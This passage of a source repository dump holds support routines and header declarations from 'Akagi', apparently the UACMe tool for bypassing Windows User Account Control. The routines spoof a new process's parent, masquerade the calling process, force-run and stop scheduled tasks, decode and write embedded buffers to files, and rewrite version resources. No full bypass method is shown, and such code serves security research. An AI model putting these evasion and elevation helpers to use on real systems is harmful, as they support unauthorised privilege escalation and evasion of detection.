LPWSTR lpApplicationName,\n    _In_ LPWSTR lpszParameters,\n    _In_opt_ LPWSTR lpCurrentDirectory,\n    _In_ ULONG CreationFlags,\n    _In_ WORD ShowWindowFlags,\n    _Out_opt_ HANDLE* PrimaryThread\n)\n{\n    BOOL bResult = FALSE;\n    DWORD dwFlags = CreationFlags | CREATE_DEFAULT_ERROR_MODE | NORMAL_PRIORITY_CLASS;\n\n    HANDLE hNewProcess = NULL;\n\n    LPWSTR pszBuffer = NULL;\n    SIZE_T size;\n    STARTUPINFOEX si;\n    
PROCESS_INFORMATION pi;\n\n    if (PrimaryThread)\n        *PrimaryThread = NULL;\n\n    RtlSecureZeroMemory(&pi, sizeof(pi));\n    RtlSecureZeroMemory(&si, sizeof(si));\n\n    size = (1 + _strlen(lpszParameters)) * sizeof(WCHAR);\n    pszBuffer = (LPWSTR)supHeapAlloc(size);\n    if (pszBuffer) {\n\n        _strcpy(pszBuffer, lpszParameters);\n        si.StartupInfo.cb = sizeof(STARTUPINFOEX);\n\n        size = 0x30;\n\n        do {\n            if (size > 1024)\n                break;\n\n            si.lpAttributeList = supHeapAlloc(size);\n            if (si.lpAttributeList) {\n\n                if (InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &size)) {\n                    if (UpdateProcThreadAttribute(si.lpAttributeList, 0,\n                        PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &hParentProcess, sizeof(hParentProcess), 0, 0))\n                    {\n                        si.StartupInfo.dwFlags = STARTF_USESHOWWINDOW;\n                        si.StartupInfo.wShowWindow = ShowWindowFlags;\n\n                        bResult = CreateProcess(lpApplicationName,\n                            pszBuffer,\n                            NULL,\n                            NULL,\n                            FALSE,\n                            dwFlags | EXTENDED_STARTUPINFO_PRESENT,\n                            NULL,\n                            lpCurrentDirectory,\n                            (LPSTARTUPINFO)&si,\n                            &pi);\n\n                        if (bResult) {\n                            hNewProcess = pi.hProcess;\n                            if (PrimaryThread) {\n                                *PrimaryThread = pi.hThread;\n                            }\n                            else {\n                                CloseHandle(pi.hThread);\n                            }\n                        }\n\n                    }\n\n                    if (si.lpAttributeList)\n                        
DeleteProcThreadAttributeList(si.lpAttributeList); //dumb empty routine\n\n                }\n                supHeapFree(si.lpAttributeList);\n            }\n\n        } while (GetLastError() == ERROR_INSUFFICIENT_BUFFER);\n\n        supHeapFree(pszBuffer);\n    }\n\n    return hNewProcess;\n}\n\n/*\n* supCreateBindingHandle\n*\n* Purpose:\n*\n* Bind handle to the RPC interface.\n*\n*/\nRPC_STATUS supCreateBindingHandle(\n    _In_ RPC_WSTR RpcInterfaceUuid,\n    _Out_ RPC_BINDING_HANDLE* BindingHandle\n)\n{\n    RPC_STATUS status = RPC_S_INTERNAL_ERROR;\n    RPC_SECURITY_QOS_V3 sqos;\n    RPC_WSTR StringBinding = NULL;\n    RPC_BINDING_HANDLE Binding = NULL;\n    PSID LocalSystemSid = NULL;\n    DWORD cbSid = SECURITY_MAX_SID_SIZE;\n\n\n    if (BindingHandle)\n        *BindingHandle = NULL;\n\n    RtlSecureZeroMemory(&sqos, sizeof(sqos));\n\n    status = RpcStringBindingComposeW(RpcInterfaceUuid,\n        TEXT(\"ncalrpc\"),\n        NULL,\n        NULL,\n        NULL,\n        &StringBinding);\n\n    if (status == RPC_S_OK) {\n\n        status = RpcBindingFromStringBindingW(StringBinding, &Binding);\n        RpcStringFreeW(&StringBinding);\n\n        if (status == RPC_S_OK) {\n\n            LocalSystemSid = LocalAlloc(LPTR, cbSid);\n            if (LocalSystemSid) {\n                if (CreateWellKnownSid(WinLocalSystemSid, NULL, LocalSystemSid, &cbSid)) {\n\n                    sqos.Version = 3;\n                    sqos.ImpersonationType = RPC_C_IMP_LEVEL_IMPERSONATE;\n                    sqos.Capabilities = RPC_C_QOS_CAPABILITIES_MUTUAL_AUTH;\n                    sqos.IdentityTracking = 0;\n                    sqos.Sid = LocalSystemSid;\n\n                    status = RpcBindingSetAuthInfoExW(Binding,\n                        NULL,\n                        RPC_C_AUTHN_LEVEL_PKT_PRIVACY,\n                        RPC_C_AUTHN_WINNT,\n                        0,\n                        0,\n                        (RPC_SECURITY_QOS*)&sqos);\n\n                    if 
(status == RPC_S_OK) {\n                        *BindingHandle = Binding;\n                        Binding = NULL;\n                    }\n\n                }\n                else {\n                    status = GetLastError();\n                }\n                LocalFree(LocalSystemSid);\n            }\n            else {\n                status = ERROR_NOT_ENOUGH_MEMORY;\n            }\n        }\n    }\n\n    if (Binding)\n        RpcBindingFree(&Binding);\n\n    return status;\n}\n\n/*\n* supConcatenatePaths\n*\n* Purpose:\n*\n* Concatenate 2 paths.\n*\n*/\nBOOL supConcatenatePaths(\n    _Inout_ LPWSTR Target,\n    _In_ LPCWSTR Path,\n    _In_ SIZE_T TargetBufferSize\n)\n{\n    SIZE_T TargetLength, PathLength;\n    BOOL NeedSeparator;\n    SIZE_T EndingLength;\n    SIZE_T i;\n\n    if (Target == NULL || Path == NULL || TargetBufferSize == 0)\n        return FALSE;\n\n    // Find current target length.\n    TargetLength = 0;\n    while (TargetLength < TargetBufferSize && Target[TargetLength] != 0)\n        TargetLength++;\n\n    if (TargetLength >= TargetBufferSize)\n        return FALSE;\n\n    // Strip trailing backslash from target, but preserve a lone backslash.\n    if (TargetLength > 0 && Target[TargetLength - 1] == TEXT('\\\\')) {\n        // Do not strip if the target is exactly a single backslash.\n        if (!(TargetLength == 1 && Target[0] == TEXT('\\\\')))\n        {\n            TargetLength--;\n        }\n    }\n\n    // Strip leading backslash from path only if target is non‑empty.\n    if (TargetLength > 0 && Path[0] == TEXT('\\\\'))\n        Path++;\n\n    // Find path length (after possible stripping).\n    PathLength = 0;\n    while (Path[PathLength] != 0)\n        PathLength++;\n\n    // Determine if a separator is needed based on target's last character.\n    NeedSeparator = (TargetLength > 0 && Target[TargetLength - 1] != TEXT('\\\\'));\n\n    EndingLength = TargetLength + (NeedSeparator ? 
1 : 0) + PathLength + 1;\n\n    if (EndingLength > TargetBufferSize)\n        return FALSE;\n\n    // Insert separator if needed.\n    if (NeedSeparator) {\n        Target[TargetLength] = TEXT('\\\\');\n        TargetLength++;\n    }\n\n    // Copy the path.\n    for (i = 0; i < PathLength; i++)\n        Target[TargetLength + i] = Path[i];\n\n    Target[TargetLength + PathLength] = 0;\n    return TRUE;\n}\n\n/*\n* supRemoveDirectoryRecursive\n*\n* Purpose:\n*\n* Recursively deletes the specified directory and all the files in it.\n*\n*/\nBOOL supRemoveDirectoryRecursive(\n    _In_ LPCWSTR Path\n)\n{\n    BOOL            bFind = TRUE;\n    BOOL            Ret = TRUE;\n    DWORD           dwAttributes;\n    HANDLE          hFind;\n    WCHAR           szTemp[MAX_PATH + 1];\n    WCHAR           FindPath[MAX_PATH + 1];\n    WIN32_FIND_DATA FindFileData;\n\n    _strncpy(FindPath, MAX_PATH, Path, MAX_PATH);\n    dwAttributes = GetFileAttributes(Path);\n\n    if (dwAttributes & FILE_ATTRIBUTE_DIRECTORY) {\n        supConcatenatePaths(FindPath, TEXT(\"*.*\"), MAX_PATH);\n    }\n\n    hFind = FindFirstFile(FindPath, &FindFileData);\n\n    while (hFind != INVALID_HANDLE_VALUE && bFind != FALSE) {\n\n        _strncpy(szTemp, MAX_PATH, Path, MAX_PATH);\n        supConcatenatePaths(szTemp, FindFileData.cFileName, MAX_PATH);\n\n        //\n        // This is a directory, reenter.\n        //\n        if ((FindFileData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) &&\n            (FindFileData.cFileName[0] != TEXT('.'))) {\n\n            if (!supRemoveDirectoryRecursive(szTemp)) {\n\n                Ret = FALSE;\n            }\n\n            RemoveDirectory(szTemp);\n        }\n\n        //\n        // Remove file.\n        //\n        else if (!(FindFileData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)) {\n\n            DeleteFile(szTemp);\n        }\n\n        bFind = FindNextFile(hFind, &FindFileData);\n    }\n\n    FindClose(hFind);\n\n    //\n    // Remove the root 
directory.\n    //\n    dwAttributes = GetFileAttributes(Path);\n    if (dwAttributes & FILE_ATTRIBUTE_DIRECTORY) {\n\n        if (!RemoveDirectory(Path)) {\n\n            Ret = FALSE;\n        }\n    }\n\n    return Ret;\n}\n\n/*\n* supEnumProcessesForSession\n*\n* Purpose:\n*\n* Enumerate running processes in given session and run callback.\n*\n*/\nBOOL supEnumProcessesForSession(\n    _In_ ULONG SessionId,\n    _In_ pfnEnumProcessCallback Callback,\n    _In_opt_ PVOID UserContext\n)\n{\n    BOOL bStopEnumeration = FALSE;\n    ULONG nextEntryDelta = 0;\n    PVOID processList;\n\n    union {\n        PSYSTEM_PROCESS_INFORMATION Processes;\n        PBYTE ListRef;\n    } List;\n\n    processList = supGetSystemInfo(SystemProcessInformation);\n    if (processList) {\n\n        List.ListRef = (PBYTE)processList;\n\n        do {\n\n            List.ListRef += nextEntryDelta;\n\n            if (List.Processes->SessionId == SessionId) {\n\n                bStopEnumeration = Callback(List.Processes, UserContext);\n                if (bStopEnumeration)\n                    break;\n\n            }\n\n            nextEntryDelta = List.Processes->NextEntryDelta;\n\n        } while (nextEntryDelta);\n\n        supHeapFree(processList);\n\n    }\n\n    return bStopEnumeration;\n}\n\n/*\n* supEnableToastForProtocol\n*\n* Purpose:\n*\n* Enumerate registered prog id's for the given interface and enable/disable toast for them.\n*\n*/\nVOID supEnableToastForProtocol(\n    _In_ LPCWSTR lpProtocol,\n    _In_ BOOL fEnable\n)\n{\n    HRESULT hr;\n    DWORD celtFetched, dwValue;\n    SIZE_T cbName;\n    LPWSTR lpProgId, lpValue;\n    IAssocHandler* assocHandler;\n    IEnumAssocHandlers* enumHandlers = NULL;\n    IObjectWithProgID* progId = NULL;\n\n    if (FAILED(SHAssocEnumHandlersForProtocolByApplication(lpProtocol,\n        &IID_IEnumAssocHandlers, (PVOID*)&enumHandlers)))\n    {\n        return;\n    }\n\n    do {\n        celtFetched = 0;\n        assocHandler = NULL;\n        hr = 
enumHandlers->lpVtbl->Next(enumHandlers, 1, &assocHandler, &celtFetched);\n        if (SUCCEEDED(hr) && celtFetched) {\n\n            hr = assocHandler->lpVtbl->QueryInterface(assocHandler,\n                &IID_IObjectWithProgID, (PVOID*)&progId);\n\n            if (SUCCEEDED(hr)) {\n\n                lpProgId = NULL;\n                hr = progId->lpVtbl->GetProgID(progId, &lpProgId);\n                if (SUCCEEDED(hr) && lpProgId) {\n\n                    cbName = (4 + _strlen(lpProtocol) +\n                        _strlen(lpProgId) + 1) * sizeof(WCHAR);\n                    lpValue = (LPWSTR)supHeapAlloc(cbName);\n                    if (lpValue) {\n\n                        _strcpy(lpValue, lpProgId);\n                        _strcat(lpValue, TEXT(\"_\"));\n                        _strcat(lpValue, lpProtocol);\n\n                        dwValue = fEnable;\n\n                        RegSetKeyValue(HKEY_CURRENT_USER,\n                            T_APP_ASSOC_TOASTS,\n                            lpValue,\n                            REG_DWORD,\n                            (LPCVOID)&dwValue,\n                            sizeof(DWORD));\n\n\n                        supHeapFree(lpValue);\n                    }\n                    CoTaskMemFree(lpProgId);\n                }\n\n                progId->lpVtbl->Release(progId);\n            }\n\n            assocHandler->lpVtbl->Release(assocHandler);\n        }\n\n    } while (celtFetched);\n\n    enumHandlers->lpVtbl->Release(enumHandlers);\n\n}\n\n/*\n* supWaitForChildProcesses\n*\n* Purpose:\n*\n* Check for child instances of process with given name is running and wait some time.\n*\n*/\nULONG supWaitForChildProcesses(\n    _In_ LPCWSTR lpProcessName,\n    _In_ DWORD dwWaitMiliseconds\n)\n{\n    BOOL bRetry;\n    DWORD dwCreatorPid, dwSessionId, dummy, dwCurrentWait, dwMaxWait = dwWaitMiliseconds;\n    PROCESS_BASIC_INFORMATION pbi;\n    ULONG nextEntryDelta;\n    PVOID processList;\n    HANDLE hEnumProcess;\n    
OBJECT_ATTRIBUTES obja;\n    CLIENT_ID cid;\n    UNICODE_STRING lookupPsName;\n\n    union {\n        PSYSTEM_PROCESS_INFORMATION Processes;\n        PBYTE ListRef;\n    } List;\n\n    dwCreatorPid = HandleToULong(NtCurrentTeb()->ClientId.UniqueProcess);\n    dwSessionId = NtCurrentPeb()->SessionId;\n\n    dwCurrentWait = 0;\n    if (dwMaxWait < 1000) dwMaxWait = 1000;\n    RtlSecureZeroMemory(&pbi, sizeof(pbi));\n    RtlInitUnicodeString(&lookupPsName, lpProcessName);\n    InitializeObjectAttributes(&obja, NULL, 0, NULL, NULL);\n\n    do {\n\n        bRetry = FALSE;\n\n        processList = supGetSystemInfo(SystemProcessInformation);\n        if (processList) {\n\n            List.ListRef = (PBYTE)processList;\n            nextEntryDelta = 0;\n\n            do {\n\n                List.ListRef += nextEntryDelta;\n\n                if (List.Processes->SessionId == dwSessionId &&\n                    RtlEqualUnicodeString(&lookupPsName,\n                        &List.Processes->ImageName,\n                        TRUE))\n                {\n\n                    hEnumProcess = NULL;\n                    cid.UniqueProcess = List.Processes->UniqueProcessId;\n                    cid.UniqueThread = NULL;\n\n                    if (NT_SUCCESS(NtOpenProcess(\n                        &hEnumProcess,\n                        PROCESS_QUERY_LIMITED_INFORMATION,\n                        &obja,\n                        &cid)))\n                    {\n                        if (NT_SUCCESS(NtQueryInformationProcess(hEnumProcess,\n                            ProcessBasicInformation,\n                            &pbi,\n                            sizeof(pbi),\n                            &dummy)))\n                        {\n                            bRetry = (pbi.InheritedFromUniqueProcessId == dwCreatorPid);\n                        }\n\n                        NtClose(hEnumProcess);\n                    }\n\n                }\n\n                if (bRetry)\n                    
break;\n\n                nextEntryDelta = List.Processes->NextEntryDelta;\n\n            } while (nextEntryDelta);\n\n            supHeapFree(processList);\n\n        }\n        else\n            break;\n\n        if (bRetry) {\n            Sleep(1000);\n            dwCurrentWait += 1000;\n        }\n        else \n            break;\n\n    } while (dwCurrentWait <= dwMaxWait);\n\n    return dwCurrentWait;\n}\n\n/*\n* supRaiseHardError\n*\n* Purpose:\n*\n* Display UACMe hard error.\n*\n*/\nVOID supRaiseHardError(\n    _In_ NTSTATUS HardErrorStatus\n)\n{\n    ULONG dwFlags;\n    HMODULE hModule = NULL;\n    WCHAR errorBuffer[1024];\n\n    UNICODE_STRING usText;\n    ULONG_PTR params[] = { (ULONG_PTR)&usText };\n    HARDERROR_RESPONSE heResponse;\n\n    if (HRESULT_FACILITY(HardErrorStatus) == FACILITY_WIN32) {\n        dwFlags = FORMAT_MESSAGE_IGNORE_INSERTS | FORMAT_MESSAGE_FROM_SYSTEM;\n    }\n    else {\n        dwFlags = FORMAT_MESSAGE_IGNORE_INSERTS | FORMAT_MESSAGE_FROM_HMODULE;\n        hModule = GetModuleHandle(RtlNtdllName);\n    }\n\n    errorBuffer[0] = 0;\n\n    if (FormatMessage(dwFlags,\n        hModule,\n        HardErrorStatus,\n        0,\n        errorBuffer,\n        RTL_NUMBER_OF(errorBuffer),\n        NULL))\n    {\n        RtlInitUnicodeString(&usText, errorBuffer);\n\n        NtRaiseHardError(STATUS_FATAL_APP_EXIT | HARDERROR_OVERRIDE_ERRORMODE,\n            RTL_NUMBER_OF(params),\n            1,\n            (PULONG_PTR)params,\n            OptionOk,\n            (PULONG)&heResponse);\n    }\n}\n\n/*\n* supGetThreadTokenImpersonationLevel\n*\n* Purpose:\n*\n* Query thread token impersonation level.\n*\n*/\nBOOL supGetThreadTokenImpersonationLevel(\n    _In_ HANDLE ThreadHandle,\n    _Out_ PSECURITY_IMPERSONATION_LEVEL ImpersonationLevel)\n{\n    ULONG dummy;\n    HANDLE hToken = NULL;\n    SECURITY_IMPERSONATION_LEVEL level = SecurityAnonymous;\n    NTSTATUS ntStatus;\n\n    ntStatus = NtOpenThreadToken(ThreadHandle,\n        
MAXIMUM_ALLOWED,\n        TRUE,\n        &hToken);\n\n    if (NT_SUCCESS(ntStatus)) {\n\n        ntStatus = NtQueryInformationToken(hToken,\n            TokenImpersonationLevel,\n            (PVOID)&level,\n            sizeof(SECURITY_IMPERSONATION_LEVEL),\n            &dummy);\n\n        NtClose(hToken);\n    }\n\n    *ImpersonationLevel = level;\n    return NT_SUCCESS(ntStatus);\n}\n\n/*\n* supGetTickCount64\n*\n* Purpose:\n*\n* GetTickCount64 eqv.\n*\n*/\nULONGLONG supGetTickCount64(\n    VOID\n)\n{\n    ULARGE_INTEGER tickCount;\n\n#ifdef _WIN64\n\n    tickCount.QuadPart = USER_SHARED_DATA->TickCountQuad;\n\n#else\n\n    while (TRUE)\n    {\n        tickCount.HighPart = (ULONG)USER_SHARED_DATA->TickCount.High1Time;\n        tickCount.LowPart = USER_SHARED_DATA->TickCount.LowPart;\n\n        if (tickCount.HighPart == (ULONG)USER_SHARED_DATA->TickCount.High2Time)\n            break;\n\n        NtYieldExecution();\n    }\n\n#endif\n\n    return (UInt32x32To64(tickCount.LowPart, USER_SHARED_DATA->TickCountMultiplier) >> 24) +\n        (UInt32x32To64(tickCount.HighPart, USER_SHARED_DATA->TickCountMultiplier) << 8);\n}\n\n/*\n* supxExamineTaskhost\n*\n* Purpose:\n*\n* Find all tasks registered with the host process and stop them.\n*\n*/\nBOOL supxExamineTaskhost(\n    _In_ HANDLE UniqueProcessId\n)\n{\n    HRESULT hr = E_FAIL;\n    ULONG processId;\n    LONG i, cTasks = 0;\n    VARIANT varDummy, varIndex;\n    ITaskService* pService = NULL;\n    IRunningTaskCollection* pTasks = NULL;\n    IRunningTask* pTask;\n    TASK_STATE taskState = TASK_STATE_UNKNOWN;\n\n    do {\n\n        hr = CoCreateInstance(&CLSID_TaskScheduler,\n            NULL,\n            CLSCTX_INPROC_SERVER,\n            &IID_ITaskService,\n            (void**)&pService);\n\n        HRESULT_BREAK_ON_FAILED(hr);\n\n        VariantInit(&varDummy);\n\n        hr = pService->lpVtbl->Connect(pService,\n            varDummy,\n            varDummy,\n            varDummy,\n            varDummy);\n\n        
HRESULT_BREAK_ON_FAILED(hr);\n\n        hr = pService->lpVtbl->GetRunningTasks(pService,\n            TASK_ENUM_HIDDEN,\n            &pTasks);\n\n        HRESULT_BREAK_ON_FAILED(hr);\n\n        hr = pTasks->lpVtbl->get_Count(pTasks, &cTasks);\n\n        HRESULT_BREAK_ON_FAILED(hr);\n\n        varIndex.vt = VT_INT;\n\n        for (i = 1; i <= cTasks; i++) {\n\n            varIndex.lVal = i;\n\n            hr = pTasks->lpVtbl->get_Item(pTasks, varIndex, &pTask);\n            if (SUCCEEDED(hr)) {\n\n                processId = 0;\n                hr = pTask->lpVtbl->get_EnginePID(pTask, &processId);\n                if (SUCCEEDED(hr) && processId == HandleToUlong(UniqueProcessId)) {\n\n                    hr = pTask->lpVtbl->get_State(pTask, &taskState);\n                    if (taskState == TASK_STATE_RUNNING) {\n                        hr = pTask->lpVtbl->Stop(pTask);\n                    }\n                }\n                pTask->lpVtbl->Release(pTask);\n            }\n        }\n\n\n    } while (FALSE);\n\n    if (pTasks)\n        pTasks->lpVtbl->Release(pTasks);\n\n    if (pService)\n        pService->lpVtbl->Release(pService);\n\n    return SUCCEEDED(hr);\n}\n\n/*\n* supEnumTaskhostTasksCallback\n*\n* Purpose:\n*\n* Callback for taskhost task enumeration.\n*\n*/\nBOOL CALLBACK supEnumTaskhostTasksCallback(\n    _In_ PSYSTEM_PROCESS_INFORMATION ProcessEntry,\n    _In_ PVOID UserContext\n)\n{\n    PUNICODE_STRING targetProcess = (PUNICODE_STRING)UserContext;\n\n    if (!RtlEqualUnicodeString(&ProcessEntry->ImageName, targetProcess, TRUE))\n        return FALSE;\n\n    supxExamineTaskhost(ProcessEntry->UniqueProcessId);\n\n    return FALSE;\n}\n\n/*\n* supStartScheduledTask\n*\n* Purpose:\n*\n* Run target task as schtasks does.\n*\n*/\nBOOLEAN supStartScheduledTask(\n    _In_ LPCWSTR lpTaskFolder,\n    _In_ LPCWSTR lpTaskName\n)\n{\n    HRESULT hr_init, hr = E_FAIL;\n    ITaskService* pService = NULL;\n    ITaskFolder* pRootFolder = NULL;\n    IRegisteredTask* 
pTask = NULL;\n    IRunningTask* pRunningTask = NULL;\n    VARIANT var;\n\n    BSTR bstrTaskFolder = NULL;\n    BSTR bstrTask = NULL;\n\n    hr_init = CoInitializeEx(NULL, COINIT_MULTITHREADED);\n\n    do {\n\n        bstrTaskFolder = SysAllocString(lpTaskFolder);\n        if (bstrTaskFolder == NULL) {\n            break;\n        }\n\n        bstrTask = SysAllocString(lpTaskName);\n        if (bstrTask == NULL) {\n            break;\n        }\n\n        hr = CoCreateInstance(&CLSID_TaskScheduler,\n            NULL,\n            CLSCTX_INPROC_SERVER,\n            &IID_ITaskService,\n            (void**)&pService);\n\n        if (FAILED(hr)) {\n            break;\n        }\n\n        var.vt = VT_NULL;\n\n        hr = pService->lpVtbl->Connect(pService, var, var, var, var);\n        if (FAILED(hr)) {\n            break;\n        }\n\n        hr = pService->lpVtbl->GetFolder(pService, bstrTaskFolder, &pRootFolder);\n        if (FAILED(hr)) {\n            break;\n        }\n\n        hr = pRootFolder->lpVtbl->GetTask(pRootFolder, bstrTask, &pTask);\n        if (FAILED(hr)) {\n            break;\n        }\n\n        hr = pTask->lpVtbl->RunEx(pTask, var, TASK_RUN_IGNORE_CONSTRAINTS, 0, NULL, &pRunningTask);\n        if (FAILED(hr)) {\n            break;\n        }\n\n    } while (FALSE);\n\n    if (bstrTaskFolder)\n        SysFreeString(bstrTaskFolder);\n\n    if (bstrTask)\n        SysFreeString(bstrTask);\n\n    if (pRunningTask) {\n        pRunningTask->lpVtbl->Stop(pRunningTask);\n        pRunningTask->lpVtbl->Release(pRunningTask);\n    }\n\n    if (pTask)\n        pTask->lpVtbl->Release(pTask);\n\n    if (pRootFolder)\n        pRootFolder->lpVtbl->Release(pRootFolder);\n\n    if (pService)\n        pService->lpVtbl->Release(pService);\n\n    if (SUCCEEDED(hr_init))\n        CoUninitialize();\n\n    return SUCCEEDED(hr);\n}\n\n/*\n* supReplaceVersionInfo\n*\n* Purpose:\n*\n* Add a new VERSION_INFO block to the file.\n*\n*/\nBOOLEAN supReplaceVersionInfo(\n    
_In_ LPCWSTR lpFileName,\n    _In_ PBYTE lpResource,\n    _In_ DWORD dwResourceSize,\n    _In_ DWORD dwKey\n)\n{\n    BOOLEAN bResult = TRUE;\n    HANDLE hUpdate;\n    PVOID pvBuffer;\n    SIZE_T bufferSize = ALIGN_UP_BY(dwResourceSize, PAGE_SIZE);\n\n    do {\n        pvBuffer = supVirtualAlloc(&bufferSize, DEFAULT_ALLOCATION_TYPE | MEM_TOP_DOWN, DEFAULT_PROTECT_TYPE, NULL);\n        if (pvBuffer == NULL) {\n            bResult = FALSE;\n            break;\n        }\n\n        RtlCopyMemory(pvBuffer, lpResource, dwResourceSize);\n        EncodeBuffer(pvBuffer, dwResourceSize, dwKey);\n\n        hUpdate = BeginUpdateResource(lpFileName, FALSE);\n        if (hUpdate == NULL) {\n            bResult = FALSE;\n            break;\n        }\n\n        if (!UpdateResource(hUpdate, RT_VERSION, MAKEINTRESOURCEW(1),\n            MAKELANGID(LANG_ENGLISH, SUBLANG_ENGLISH_US),\n            pvBuffer, dwResourceSize))\n        {\n            //\n            // Discard pending changes and report the failure to the caller.\n            //\n            EndUpdateResource(hUpdate, TRUE);\n            bResult = FALSE;\n            break;\n        }\n\n        //\n        // The update is only committed if EndUpdateResource succeeds.\n        //\n        if (!EndUpdateResource(hUpdate, FALSE))\n            bResult = FALSE;\n\n    } while (FALSE);\n\n    if (pvBuffer)\n        supSecureVirtualFree(pvBuffer, bufferSize, NULL);\n\n    return bResult;\n}\n"
  },
  {
    "path": "Source/Akagi/sup.h",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2014 - 2025\n*\n*  TITLE:       SUP.H\n*\n*  VERSION:     3.68\n*\n*  DATE:        07 Mar 2025\n*\n*  Common header file for the program support routines.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\ntypedef int(__cdecl* pswprintf_s)(\n    wchar_t* buffer,\n    size_t sizeOfBuffer,\n    const wchar_t* format,\n    ...);\n\n#define TEXT_SECTION \".text\"\n#define TEXT_SECTION_LEGNTH sizeof(TEXT_SECTION)\n\n//\n// Shell association start.\n//\n\ntypedef enum {\n    UASET_CLEAR = 0,\n    UASET_APPLICATION,\n    UASET_PROGID,\n} UASET;\n\ntypedef HRESULT(WINAPI* pfnUserAssocSet)(\n    UASET set,\n    LPCWSTR pszExt,\n    LPCWSTR pszSet);\n\ntypedef HRESULT(WINAPI* pfnUserAssocSet2)(\n    UASET set,\n    LPCWSTR pszExt,\n    LPCWSTR pszSet,\n    ULONG dwFlags);\n\ntypedef struct _USER_ASSOC_PTR {\n    union {\n        pfnUserAssocSet UserAssocSet;\n        pfnUserAssocSet2 UserAssocSet2; //Win10 1904 1909\n    } DUMMYUNIONNAME;\n    BOOL Valid;\n} USER_ASSOC_PTR, * PUSER_ASSOC_PTR;\n\ntypedef struct USER_ASSOC_PATTERN {\n    PVOID Ptr;\n    DWORD Size;\n} USER_ASSOC_PATTERN, * PUSER_ASSOC_PATTERN;\n\ntypedef struct USER_ASSOC_SIGNATURE {\n    ULONG NtBuildMin;\n    ULONG NtBuildMax;\n    ULONG PatternsCount;\n    PVOID PatternsTable;\n} USER_ASSOC_SIGNATURE, * PUSER_ASSOC_SIGNATURE;\n\ntypedef VOID(WINAPI* PSUP_UAS_ENUMERATION_CALLBACK_FUNCTION)(\n    _In_     PUSER_ASSOC_SIGNATURE Signature,\n    _In_opt_ PVOID Context,\n    _Inout_  BOOLEAN* StopEnumeration\n    );\n\n//\n// Shell association end.\n//\n\ntypedef struct _SXS_SEARCH_CONTEXT {\n    LPWSTR 
DllName;\n    LPWSTR SxsKey;\n    LPWSTR FullDllPath;\n} SXS_SEARCH_CONTEXT, *PSXS_SEARCH_CONTEXT;\n\n//ntifs.h\ntypedef struct _REPARSE_DATA_BUFFER {\n    ULONG  ReparseTag;\n    USHORT ReparseDataLength;\n    USHORT Reserved;\n    union {\n        struct {\n            USHORT SubstituteNameOffset;\n            USHORT SubstituteNameLength;\n            USHORT PrintNameOffset;\n            USHORT PrintNameLength;\n            ULONG Flags;\n            WCHAR PathBuffer[1];\n        } SymbolicLinkReparseBuffer;\n        struct {\n            USHORT SubstituteNameOffset;\n            USHORT SubstituteNameLength;\n            USHORT PrintNameOffset;\n            USHORT PrintNameLength;\n            WCHAR PathBuffer[1];\n        } MountPointReparseBuffer;\n        struct {\n            UCHAR  DataBuffer[1];\n        } GenericReparseBuffer;\n    } DUMMYUNIONNAME;\n} REPARSE_DATA_BUFFER, *PREPARSE_DATA_BUFFER;\n\n#define REPARSE_DATA_BUFFER_HEADER_LENGTH FIELD_OFFSET(REPARSE_DATA_BUFFER, GenericReparseBuffer.DataBuffer)\n\n\n//\n// Memory allocator flags.\n//\n#define DEFAULT_ALLOCATION_TYPE (MEM_COMMIT | MEM_RESERVE)\n#define DEFAULT_PROTECT_TYPE PAGE_READWRITE\n\n//\n// sup* prototypes\n//\n\nVOID supSetLastErrorFromNtStatus(\n    _In_ NTSTATUS LastNtStatus);\n\nBOOLEAN supIsProcess32bit(\n    _In_ HANDLE hProcess);\n\nBOOL supGetElevationType(\n    _Out_ TOKEN_ELEVATION_TYPE *lpType);\n\nBOOL supWriteBufferToFile(\n    _In_ LPCWSTR lpFileName,\n    _In_opt_ PVOID Buffer,\n    _In_ DWORD BufferSize);\n\nBOOL supDecodeAndWriteBufferToFile(\n    _In_ LPWSTR lpFileName,\n    _In_ CONST PVOID Buffer,\n    _In_ DWORD BufferSize,\n    _In_ ULONG Key);\n\nPBYTE supReadFileToBuffer(\n    _In_ LPCWSTR lpFileName,\n    _Inout_opt_ LPDWORD lpBufferSize);\n\nHANDLE supRunProcess3(\n    _In_ LPCWSTR lpFile,\n    _In_opt_ LPCWSTR lpParameters,\n    _In_opt_ LPCWSTR lpVerb,\n    _In_ INT nShow);\n\nBOOL supRunProcess2(\n    _In_ LPCWSTR lpFile,\n    _In_opt_ LPCWSTR lpParameters,\n    
_In_opt_ LPCWSTR lpVerb,\n    _In_ INT nShow,\n    _In_ ULONG mTimeOut);\n\nBOOL supRunProcess(\n    _In_ LPCWSTR lpFile,\n    _In_opt_ LPCWSTR lpParameters);\n\nvoid supCopyMemory(\n    _Inout_ void *dest,\n    _In_ size_t cbdest,\n    _In_ const void *src,\n    _In_ size_t cbsrc);\n\nLPWSTR supQueryEnvironmentVariableOffset(\n    _In_ PUNICODE_STRING Value);\n\nDWORD supCalculateCheckSumForMappedFile(\n    _In_ PVOID BaseAddress,\n    _In_ ULONG FileLength);\n\nBOOLEAN supVerifyMappedImageMatchesChecksum(\n    _In_ PVOID BaseAddress,\n    _In_ ULONG FileLength);\n\nBOOLEAN supSetCheckSumForMappedFile(\n    _In_ PVOID BaseAddress,\n    _In_ ULONG CheckSum);\n\nNTSTATUS supLdrQueryResourceDataEx(\n    _In_ ULONG_PTR ResourceId,\n    _In_ PVOID DllHandle,\n    _Out_ PULONG DataSize,\n    _Out_ PVOID* Data);\n\nPBYTE supLdrQueryResourceData(\n    _In_ ULONG_PTR ResourceId,\n    _In_ PVOID DllHandle,\n    _Out_ PULONG DataSize);\n\nVOID supMasqueradeProcess(\n    _In_ BOOL Restore);\n\nDWORD supExpandEnvironmentStrings(\n    _In_ LPCWSTR lpSrc,\n    _In_ LPWSTR lpDst,\n    _In_ DWORD nSize);\n\nBOOL sxsFindLoaderEntry(\n    _In_ PSXS_SEARCH_CONTEXT Context);\n\nVOID 